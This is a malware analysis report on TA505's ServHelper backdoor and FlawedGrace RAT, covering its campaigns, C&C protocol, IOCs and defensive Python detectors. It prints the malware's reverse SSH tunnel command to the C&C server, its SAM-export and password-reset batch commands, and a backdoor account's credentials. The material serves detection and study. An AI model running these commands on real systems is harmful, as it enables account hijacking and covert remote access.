Overview
For much of 2018, we observed threat actors increasingly distributing downloaders, backdoors, information stealers, remote access Trojans (RATs), and more as they abandoned ransomware as their primary payload. In November 2018, TA505, a prolific actor that has been at the forefront of this trend, began distributing a new backdoor we named “ServHelper”. ServHelper has two variants: one focused on remote desktop functions and a second that primarily functions as a downloader. Additionally, we have observed the downloader variant download malware we call “FlawedGrace.” FlawedGrace is a full-featured RAT that we first observed in November 2017. TA505 appears to be actively targeting banks, retail businesses, and restaurants as they distribute these malware families. This targeting falls in line with other activity we reported earlier in 2018.[1] [2]
Campaign Analysis
November 9 “Tunnel” Campaign
On November 9, 2018, we observed a relatively small email campaign (thousands of messages) delivering a new malware family that we call “ServHelper” based on file names associated with infection. The campaign primarily targeted financial institutions and was attributed to the threat actor TA505. The messages (Figure 1) contained Microsoft Word or Publisher attachments with macros that, when enabled, downloaded and executed the malware. This campaign used the “tunnel” variant of ServHelper, described in the “Malware Analysis” section.
Figure 1: Example email message from the November 9 “tunnel” campaign
November 15 “Downloader” Campaign
On November 15, 2018, we saw a similar, but larger campaign (tens of thousands of messages) from the same actor. In addition to financial institutions, this campaign also targeted the retail industry. The messages (Figure 2) contained Microsoft “.doc”, “.pub”, or “.wiz” attachments. The documents contained macros that, when enabled, downloaded and executed the ServHelper malware. This campaign used the “downloader” variant of ServHelper with the tunneling functionality removed.
Figure 2: Example email message from the November 15 “downloader” campaign
December 13 “FlawedGrace” Campaign
On December 13, 2018, we observed another large ServHelper “downloader” campaign targeting retail and financial services customers. The messages used a mixture of Microsoft Word attachments with embedded malicious macros, PDF attachments with URLs linking to a fake “Adobe PDF Plugin” webpage linking to the malware (Figure 3), and direct URLs in the email body linking to a ServHelper executable.
Figure 3: Example PDF attachment containing a URL linking to the fake “Adobe PDF Plugin” page
In this campaign, we observed ServHelper download (Figure 4) and execute an additional malware that we call “FlawedGrace.” FlawedGrace is a robust remote access trojan (RAT) that we initially encountered in November 2017, but have rarely observed since.
Figure 4: Fiddler screenshot showing ServHelper downloading FlawedGrace
ServHelper Malware Analysis
ServHelper is a new malware family -- best classified as a backdoor -- that we first observed in the wild in November 2018. Its name is based on a filename (ServHelper.dll) that we noted in the November 9 “tunnel” campaign described above. A sample from a later campaign used command and control (C&C) URIs containing “/rest/serv.php” which also reference a “serv” component.
The malware is written in Delphi and at the time of this writing is being actively developed. New commands and functionality are being added to the malware in almost every new campaign so we will not focus on one specific sample for this analysis. Rather, we will discuss the malware family generally; see the “Indicators of Compromise” section below for specific reference samples.
As noted, there are two distinct variants of ServHelper: a “tunnel” variant and a “downloader” variant. The “tunnel” variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to “hijack” legitimate user accounts or their web browser profiles and use them as they see fit. The “downloader” variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.
Both variants of ServHelper use the same HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP). An example of the initial phone home to the C&C server is shown in Figure 5.
Figure 5: Example of ServHelper’s initial phone home
Early versions of the malware used a semi-random URI such as: “/ghuae/huadh.php”. Newer versions have started using more typical URIs such as:
- /support/form.php
- /rest/serv.php
- /sav/s.php
Most of the C&C domains that we have observed have been in the “.pw” top-level domain (TLD) such as:
- checksolutions[.]pw
- afgdhjkrm[.]pw
- pointsoft[.]pw
- dedoshop[.]pw
However, recently the developer has added support for “.bit” C&C domains; this TLD is associated with the cryptocurrency Namecoin and requires special DNS servers that the malware uses:
- dedsolutions[.]bit
- arepos[.]bit
The POST data in these C&C communications contains three URL-encoded parameters: “key”, “sysid”, and “resp”. The “key” parameter is a hardcoded string in the malware that does not appear to be used elsewhere in the code. Examples of observed keys include:
- Gsiss744@sd
- asdgdgYss455
- #567sisGdsa
The “sysid” parameter contains a campaign ID in newer versions of the malware, the Windows version running on the infected machine, system architecture, username, and a random integer. Examples of observed campaign IDs include:
- clean12
- chistka12.17
- noP_19
- nonRDP
- no24
- ny_upd
The “resp” parameter contains responses to commands received from the controller.
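As an added illustration of the beacon format just described (this is not code from the original post, nor from the malware), the following Python decoder picks ServHelper-style POSTs out of proxy or capture output and splits the caret-delimited command replies described in the next paragraph. The known URIs, “key” values and campaign IDs are the ones listed above; the request tuples and reply strings are constructed, and treating the campaign ID as the leading token of “sysid” is an assumption, since the post does not fix the field order inside that parameter.

```python
"""
Added example (not from the original Proofpoint post): a small decoder for the
ServHelper HTTP beacon format, meant for triaging proxy logs or PCAP output.
Known URIs, "key" values and campaign IDs are quoted from the post; the sample
requests below are constructed for illustration, not captured traffic.
"""
from urllib.parse import parse_qs

# URI paths and hardcoded "key" values quoted in the post.
KNOWN_URIS = {"/ghuae/huadh.php", "/support/form.php", "/rest/serv.php", "/sav/s.php"}
KNOWN_KEYS = {"Gsiss744@sd", "asdgdgYss455", "#567sisGdsa"}
KNOWN_CAMPAIGN_IDS = {"clean12", "chistka12.17", "noP_19", "nonRDP", "no24", "ny_upd"}


def parse_beacon(method, uri, body):
    """Return a dict describing a request that looks like a ServHelper beacon, else None.

    A beacon is a POST whose body carries the three URL-encoded parameters
    "key", "sysid" and "resp". The campaign ID is recovered by checking whether
    "sysid" starts with a known ID (assumption: the ID is the leading token).
    """
    if method != "POST":
        return None
    params = parse_qs(body, keep_blank_values=True)
    if not all(p in params for p in ("key", "sysid", "resp")):
        return None
    key = params["key"][0]
    sysid = params["sysid"][0]
    campaign = next((c for c in KNOWN_CAMPAIGN_IDS if sysid.startswith(c)), None)
    return {
        "uri": uri,
        "known_uri": uri in KNOWN_URIS,
        "key": key,
        "known_key": key in KNOWN_KEYS,
        "sysid": sysid,
        "campaign_id": campaign,
        "resp": params["resp"][0],
    }


def parse_command(reply):
    """Split a C&C reply of the form "command^arg1^arg2" into (command, [args])."""
    parts = reply.rstrip("\r\n").split("^")
    return parts[0], parts[1:]


# Constructed sample requests as (method, uri, body); only the first is a beacon.
SAMPLE_REQUESTS = [
    ("POST", "/rest/serv.php",
     "key=asdgdgYss455&sysid=noP_19+Windows+10+x64+alice+482913&resp=nop+ok"),
    ("GET", "/index.html", ""),
    ("POST", "/login", "user=bob&pass=x"),
]


def triage(requests):
    """Return the parsed beacons found in an iterable of (method, uri, body) tuples."""
    return [b for b in (parse_beacon(*r) for r in requests) if b]


if __name__ == "__main__":
    for hit in triage(SAMPLE_REQUESTS):
        print(hit)
    print(parse_command("tun^4444"))
```

A hit on a known URI with a known “key” is a strong indicator on its own; the “resp” field is also worth logging, since replies such as “tun ok” or “ready! try to login with pass 123” tell the analyst which command the controller issued.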
An example command sent from the C&C server to the infected machine can be seen in the Fiddler screenshot in Figure 4 above. It contains a command, a caret (“^”) delimiter, and command arguments. We observed the following commands in the malware:
nop
Implements a keep-alive type of functionality. The infected machine responds to the C&C server with a “nop ok” message.
tun (“tunnel” variant only)
Sets up a reverse SSH tunnel connecting the C&C server to the infected system’s RDP port (3389). In earlier versions, a loader component performed the initial setup for this and other commands by:
- Extracting and dropping an OpenSSH binary from its PE resources
- Extracting, dropping, and configuring the RDP Wrapper Library software from its PE resources
- Creating a new user “supportaccount” with a password of “Ghar4f5”
- Adding this user to the “Remote Desktop Users” and “Administrators” groups
In more recent versions, this functionality of the loader component was integrated into the core ServHelper code, using built-in Windows remote desktop support instead of a third-party software package. This command sets up a reverse SSH tunnel by executing the dropped OpenSSH binary with the following command line arguments:
-N -R <remote port>:localhost:3389 tunnel@<C&C server>
Once configured, ServHelper sends a “tun ok\r\nport:<remote port> tun pid:<SSH process id>” to the C&C server.
slp
Sets a sleep timeout.
fox (“tunnel” variant only)
Copies a Firefox web browser profile from one user to another. Earlier versions used the Windows “xcopy” command. Later versions download a self-extracting RAR file from the C&C server (/cp/cp.exe) and decompress it using the password “123”. One of the files in this archive is a piece of software known as "Runtime's Shadow Copy" and it is used to copy the web browser profiles.
chrome (“tunnel” variant only)
Similar to the “fox” command but for Chrome web browser profiles.
killtun (“tunnel” variant only)
Kills an SSH tunnel process associated with a particular remote port. Once killed, it sends a “killtun ok” message to the C&C server.
tunlist (“tunnel” variant only)
Gets a list of all active SSH tunnels and responds to the C&C server with a message containing “active tun: <remote port>” entries for each active tunnel.
killalltuns (“tunnel” variant only)
Kills all SSH tunnel processes.
shell
Executes a shell command and sends the response to the C&C server.
load
Downloads and runs an executable from a specified URL. Responds to the C&C server with either “load no param ok” or “load param ok” depending on whether any command-line arguments were passed to the downloaded executable.
socks (“tunnel” variant only)
Similar to the “tun” command, but allows a reverse SSH tunnel to be built between the C&C server and any server/port (as specified by the command argument) through the infected system. Once configured, a “socks ok\r\nport:<remote port> tun pid:<SSH process id>” message is sent to the C&C server.
selfkill
Removes the malware from the infected machine.
loaddll (“downloader” variant only)
A newer command that has only been observed in the “downloader” variant. Similar to the “load” command, but for DLLs.
bk (“tunnel” variant only)
A newer command similar to the “tun” command. “bk” allows the reverse SSH tunnel to be set up using a C&C specified remote host instead of the hardcoded C&C server.
hijack (“tunnel” variant only)
A newer command that appears to hijack a user account with a known password (“123”). It does so by creating and scheduling a task “test” to run a batch file containing the following commands:
- reg export hklm\sam c:\sam.reg
- reg export hklm\security c:\sec.reg
- net user <command argument username> 123
It then schedules a task “test2” to run another batch file containing the following commands:
- schtasks /delete /tn "test" /F
- reg import c:\sam.reg
- reg import c:\sec.reg
- schtasks /delete /tn "test2" /F
Finally, it runs the first scheduled task and sends a “ready! try to login with pass 123” message to the C&C server.
forcekill (“tunnel” variant only)
A newer command that is similar to the “killalltuns” command but uses the Windows “taskkill” command.
sethijack (“tunnel” variant only)
A newer command that controls an “alerting” mechanism. A separate program thread monitors user logons. When a legitimate user becomes active and the threat actor is connected to the infected system using the previously created “supportaccount” account, it runs the “chrome” and “fox” commands, copying the legitimate user’s web browser profiles to the “supportaccount” user. It then alerts the threat actor by sending message boxes containing “login detected, begin hijacking” and “profiles hijacked!” messages. These are sent by a “msg.exe” program contained in the “cp.exe” archive discussed in the “fox” command above.
chromeport (“tunnel” variant only)
A newer command that implements the same functionality as the “chrome” command.
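The host-side artifacts of the “tun” and “hijack” commands (the OpenSSH reverse-tunnel command line, the SAM/SECURITY hive exports, the password reset to “123”, and the “test”/“test2” task cleanup) are specific enough to detect from process-creation telemetry. The following Python scanner is an added example, not code from the original post or from any detection product; the log lines are constructed, and the “user|image|command line” layout is an assumed export format rather than a real EDR schema.

```python
"""
Added example (not from the original post): flag process command lines that
match the behaviour described for ServHelper's "tun" and "hijack" commands.
The sample log is constructed; the "user|image|command line" layout is an
assumed export format, not a real product schema.
"""
import re

# Each rule: (name, regex applied to the full command line), case-insensitive.
RULES = [
    # "tun": OpenSSH reverse tunnel of the local RDP port to the controller.
    ("servhelper_reverse_rdp_tunnel",
     re.compile(r"-N\s+-R\s+\d+:localhost:3389\s+tunnel@", re.I)),
    # "hijack" batch: SAM/SECURITY hive exported to a .reg file in the root of C:.
    ("servhelper_hijack_hive_export",
     re.compile(r"\breg(?:\.exe)?\s+export\s+hklm\\(?:sam|security)\s+c:\\\w+\.reg", re.I)),
    # "hijack" batch: existing account password reset to the known value "123".
    ("servhelper_hijack_password_reset",
     re.compile(r"\bnet(?:\.exe)?\s+user\s+\S+\s+123\b", re.I)),
    # "hijack" cleanup: deletion of the "test" / "test2" scheduled tasks.
    ("servhelper_hijack_task_cleanup",
     re.compile(r'\bschtasks(?:\.exe)?\s+/delete\s+/tn\s+"?test2?"?\s+/F\b', re.I)),
]


def classify(cmdline):
    """Return the names of all rules matching one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Return (user, image, matched rule names) for every line that hits a rule."""
    hits = []
    for line in lines:
        user, image, cmdline = line.split("|", 2)
        names = classify(cmdline)
        if names:
            hits.append((user, image, names))
    return hits


# Constructed process-creation records; the last one is benign.
SAMPLE_LOG = [
    r"supportaccount|C:\ProgramData\ssh.exe|ssh.exe -N -R 5000:localhost:3389 tunnel@cc.example.invalid",
    r"SYSTEM|C:\Windows\System32\reg.exe|reg export hklm\sam c:\sam.reg",
    r"SYSTEM|C:\Windows\System32\net.exe|net user alice 123",
    r'SYSTEM|C:\Windows\System32\schtasks.exe|schtasks /delete /tn "test" /F',
    r"alice|C:\Windows\System32\reg.exe|reg query hklm\software\microsoft",
]


if __name__ == "__main__":
    for user, image, names in scan(SAMPLE_LOG):
        print(f"{user}\t{image}\t{', '.join(names)}")
```

The hive-export and password-reset rules are the ones worth alerting on individually; an export of HKLM\SAM to a file by a batch file run from a scheduled task has few legitimate explanations, and the reverse-tunnel rule should be paired with a check that the OpenSSH binary is the one the organization deploys rather than one dropped into a user-writable directory.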
During some of the ServHelper “downloader” campaigns, we observed commands (e.g., as shown in Figure 4 above) instructing the malware to download and execute another malware we call “FlawedGrace”.
FlawedGrace Malware Analysis
FlawedGrace is a remote access trojan (RAT) named after debugging artifacts (class names) left in the analyzed sample (see Figure 6).
Figure 6: “Grace” class names shown by IDA Pro
The malware is written in C++. It is a very large program and makes extensive use of object-oriented and multithreaded programming techniques. This makes reverse engineering and debugging the malware both difficult and time consuming. The coding style and techniques suggest that FlawedGrace was not written by the same developer as ServHelper.
We initially observed FlawedGrace in an email campaign as early as November 2017, but until the recent ServHelper campaigns, we had not observed it being actively distributed again. The malware usually contains a debug string including a “version number” and “build date” distinct from the PE compile timestamp, allowing searches of various malware repositories to find additional versions:
- Unknown version number built at “Aug 7 2017 22:28:47”
- Version 2.0.7 built at “Oct 18 2017 04:18:39”
- Version 2.0.8 built at “Oct 26 2017 12:05:44”
- Version 2.0.9 built at “Nov 4 2017 22:28:10”
- Version 2.0.10 built at “Nov 20 2017 10:53:33”
- Version 2.0.11 built at “Dec 16 2017 08:02:46”
Per the malware’s debug strings, significant development took place during the end of 2017. The ServHelper campaigns were distributing version 2.0.10 of the malware.
FlawedGrace creates, encrypts, and stores a configuration file containing the C&C IPs and ports in a “<hex digits>.dat” file (e.g., “C:\ProgramData\21851a60.dat”). The first 16 bytes of the file are an AES initialization vector (IV). The rest of the data is AES-encrypted in CBC mode. In the analyzed sample, the AES key was hardcoded as “c3oeCSIfx0J6UtcV”. Once decrypted, the configuration data is stored as a custom serialization (Figure 7). Early versions of the malware used the class names “GraceParams” and “GraceValue” when interacting with this part of the code, so it is likely that the serialization was designed and developed by the malware developer and not a standard format.
Figure 7: Plaintext configuration file showing C&C IP and port
FlawedGrace uses a complicated binary protocol for its command and control. It can use a configurable port for communications, but all samples we have observed to date have used port 443. Figure 8 shows an example of the first four messages between an infected system and C&C server.
Figure 8: FlawedGrace’s initial C&C communications.
We are still reverse engineering and documenting the protocol, but we can provide an overview of the initial C&C communications below:
Message 1
Initial beacon from infected system. It is a 14-byte binary structure that contains at least the following parts:
- Offset 0x0: CRC32 hash of remaining data (DWORD)
- Offset 0x4: magic bytes "GCRG" (DWORD)
Message 2
Key verification message from infected system. We believe that this is used to verify that one of the encryption keys (static key) is the same on both the malware and C&C server. It is a 52-byte binary structure that contains the following analyzed offsets, among other components still under analysis:
- Offset 0x0: CRC32 hash of remaining data (DWORD)
- Offset 0x14: MD5 hash of the following pieces (16 bytes)
- A static key which has always been “static pass” in the samples analyzed
- The random bytes at offset 0x24 that have been hex encoded and uppercased
- Offset 0x24: random bytes (16 bytes)
Message 3
Key exchange message from C&C server. This message delivers a second encryption key (dynamic key) used for further data transfers. It is a 42-byte structure that contains the following analyzed offsets, among other components still under analysis:
- Offset 0x0: CRC32 hash of remaining data (DWORD)
- Offset 0x1a: dynamic key (16 bytes)
Message 4
An example of data transfer between infected system and C&C server. It starts with a 38-byte binary header that contains the following analyzed offsets, among other components still under analysis:
- Offset 0x0: CRC32 hash of the next 10 bytes (DWORD)
- Offset 0xE: AES IV (16 bytes)
Following the header is the data that has been AES-encrypted in CBC mode. The AES key is generated using the “static key” and the “dynamic key” from messages 3 and 4 above. An example of key generation in Python appears in Figure 9.
Figure 9: Example FlawedGrace C&C data transfer encryption key generation in Python
Figure 10 shows an example of the plaintext data transferred in message 4.
Figure 10: Example FlawedGrace C&C message 4 plaintext data
This message contains various system and malware information that has been serialized using the same method as for configuration files. The serialized data is then packaged within additional binary data structures.
While there are other message types with their own formats, the examples here provide initial insight into FlawedGrace’s C&C protocol.
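To make the message layouts above concrete, the following Python decoder (an added example, not code from the original post or from the malware) classifies the three handshake messages by length, checks their CRC32 fields, verifies the message 2 key-verification digest against the “static pass” static key, and extracts the dynamic key from message 3 and the IV from a message 4 header. Two details the post does not state are assumed here and marked in the code: the CRC32 DWORD is little-endian, and the MD5 input is the static key immediately followed by the uppercased hex of the random bytes. The sample messages are built by small helpers so the decoder can be exercised offline; they are constructed, not captured traffic.

```python
"""
Added example (not from the original post): decoder for the documented fields of
FlawedGrace handshake messages 1-3 and the message 4 header.
Assumptions (not stated in the post): CRC32 is stored little-endian, and the
message 2 digest is MD5(static_key || uppercase hex of random bytes).
"""
import hashlib
import struct
import zlib

STATIC_KEY = b"static pass"   # value observed in all analyzed samples per the post
MAGIC = b"GCRG"


def _crc32_le(data):
    # Assumption: little-endian DWORD.
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def key_verification_digest(random_bytes, static_key=STATIC_KEY):
    """Message 2, offset 0x14: MD5 over static key + uppercased hex of the 16 random bytes."""
    return hashlib.md5(static_key + random_bytes.hex().upper().encode()).digest()


# ---- builders that produce constructed test messages (undocumented bytes left zero) ----
def build_message1():
    body = MAGIC + b"\x00" * 6
    return _crc32_le(body) + body                    # 14 bytes


def build_message2(random_bytes, static_key=STATIC_KEY):
    body = bytearray(48)
    body[0x10:0x20] = key_verification_digest(random_bytes, static_key)  # msg offset 0x14
    body[0x20:0x30] = random_bytes                                       # msg offset 0x24
    return _crc32_le(bytes(body)) + bytes(body)      # 52 bytes


def build_message3(dynamic_key):
    body = bytearray(38)
    body[0x16:0x26] = dynamic_key                    # msg offset 0x1a
    return _crc32_le(bytes(body)) + bytes(body)      # 42 bytes


# ---- decoder ----
def parse_handshake(msg):
    """Classify a raw message by length, check its CRC32, and pull out the documented fields.

    Returns a dict with "kind", "crc_ok" and the fields for that kind, or None when
    the length matches none of the documented handshake messages.
    """
    if len(msg) not in (14, 52, 42):
        return None
    crc_ok = msg[:4] == _crc32_le(msg[4:])           # CRC covers the remaining data
    if len(msg) == 14:
        return {"kind": "beacon", "crc_ok": crc_ok, "magic_ok": msg[4:8] == MAGIC}
    if len(msg) == 52:
        random_bytes = msg[0x24:0x34]
        return {"kind": "key_verification", "crc_ok": crc_ok,
                "random_bytes": random_bytes,
                "static_key_ok": msg[0x14:0x24] == key_verification_digest(random_bytes)}
    return {"kind": "key_exchange", "crc_ok": crc_ok, "dynamic_key": msg[0x1a:0x2a]}


def parse_data_header(header):
    """Message 4 header: CRC32 over the next 10 bytes at 0x0, AES IV at 0xE."""
    if len(header) < 38:
        return None
    return {"crc_ok": header[:4] == _crc32_le(header[4:14]), "iv": header[0xE:0x1E]}


if __name__ == "__main__":
    print(parse_handshake(build_message1()))
    print(parse_handshake(build_message2(bytes(range(16)))))
    print(parse_handshake(build_message3(b"k" * 16)))
```

The “static_key_ok” check is the useful part for a defender: a capture in which message 2 verifies against “static pass” ties the traffic to the analyzed samples, while a CRC-valid message 2 that does not verify suggests a sample with a changed static key, which would also change the derived data-transfer key.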
FlawedGrace also uses a series of commands, provided below for reference:
- target_remove
- target_update
- target_reboot
- target_module_load
- target_module_load_external
- target_module_unload
- target_download
- target_upload
- target_rdp
- target_passwords
- target_servers
- target_script
- destroy_os
- desktop_stat
Conclusion
Threat actor TA505 is both consistent and prolific. When the group distributes new malware, it may be a blip (like Bart ransomware, which was only distributed for one day in 2016) or, like Locky ransomware, it may become the dominant strain of malware in the wild. In this case, the group has started distributing two variants of a new backdoor we named ServHelper and a RAT we call FlawedGrace. This also extends the trend that emerged in 2018, in which threat actors increasingly focused on distribution of downloaders, information stealers, RATs, and other malware that can remain resident on victim devices for far longer than destructive, “smash and grab” malware like ransomware. We will continue to observe the distribution of these three malware variants but, at this time, they do not appear to be one-offs, but rather long-term investments by TA505.
References
[2] https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware
Indicators of Compromise (IOCs)
IOC | IOC Type | Description
52c72a9de2f6e892f07827add85ad913b0541cd5c8449aadc2722f8eb75e548c | SHA256 | November 9 “Tunnel” campaign attachment
hxxp://officemysuppbox[.]com/staterepository | URL | November 9 “Tunnel” campaign payload
1b0859ddbdebcb9d2bb46de00d73aa21bc617614b8123054426556783b211bc8 | SHA256 | November 9 “Tunnel” campaign ServHelper
hxxps://checksolutions[.]pw/ghuae/huadh.php | URL | November 9 “Tunnel” campaign ServHelper C&C
hxxps://rgoianrdfa[.]pw/ghuae/huadh.php | URL | November 9 “Tunnel” campaign ServHelper C&C
hxxps://arhidsfderm[.]pw/ghuae/huadh.php | URL | November 9 “Tunnel” campaign ServHelper C&C
eb66ebb95a3dcecae64c61f611a9332fbf460d1b8039d3ab7e4f220104a4bec4 | SHA256 | November 15 “Downloader” campaign attachment
hxxp://offficebox[.]com/host32 | URL | November 15 “Downloader” campaign payload
3cd7e0a8321259e8446b2a9da775aae674715c74ff4923cfc8ec5102f380d41a | SHA256 | November 15 “Downloader” campaign ServHelper
f4b9219f329803dd45afd5646351de456e608dd946830c961ec66c6c25e52cac | SHA256 | December 13 “FlawedGrace” campaign attachment
hxxp://office365onlinehome[.]com/host32 | URL | December 13 “FlawedGrace” campaign payload
d56429d6d0222022fe8f4cb35a28cd4fb83f87b666a186eb54d9785f01bb4b58 | SHA256 | December 13 “FlawedGrace” campaign ServHelper
hxxps://afgdhjkrm[.]pw/aggdst/Hasrt.php | URL | December 13 “FlawedGrace” campaign ServHelper C&C
efcee275d23b6e71589452b1cb3095ff92b10ab68cd07957b2ad6be587647b74 | SHA256 | December 13 “FlawedGrace” campaign FlawedGrace
46.161.27[.]241:443 | IP:Port | December 13 “FlawedGrace” campaign FlawedGrace C&C
9fccd107bd0aee3a2f39ad76a49758309c95545d8154b808eec24d2b51dc4579 | SHA256 | “sethijack” command ServHelper
hxxp://dedsolutions[.]bit/sav/s.php | URL | “sethijack” command ServHelper C&C
hxxp://dedoshop[.]pw/sav/s.php | URL | “sethijack” command ServHelper C&C
hxxp://asgaage[.]pw/sav/s.php | URL | “sethijack” command ServHelper C&C
hxxp://sghee[.]pw/sav/s.php | URL | “sethijack” command ServHelper C&C
a9492312f1258567c3633ed077990fe053776cd576aa60ac7589c6bd7829d549 | SHA256 | “loaddll” command ServHelper
hxxps://vesecase[.]com/support/form.php | URL | “loaddll” command ServHelper C&C
ET and ETPRO Suricata/Snort Signatures
2833522 ETPRO TROJAN Observed Malicious SSL Cert (HuadhServHelper RAT CnC)
2833552 ETPRO TROJAN HuadhServHelper RAT CnC Domain Observed in SNI
2833881 ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)
2833985 ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)
2834074 ETPRO TROJAN Observed Malicious SSL Cert (ServHelper CnC)
2834233 ETPRO TROJAN ServHelper CnC Inital Checkin
2828489 ETPRO TROJAN FlawedGrace CnC Activity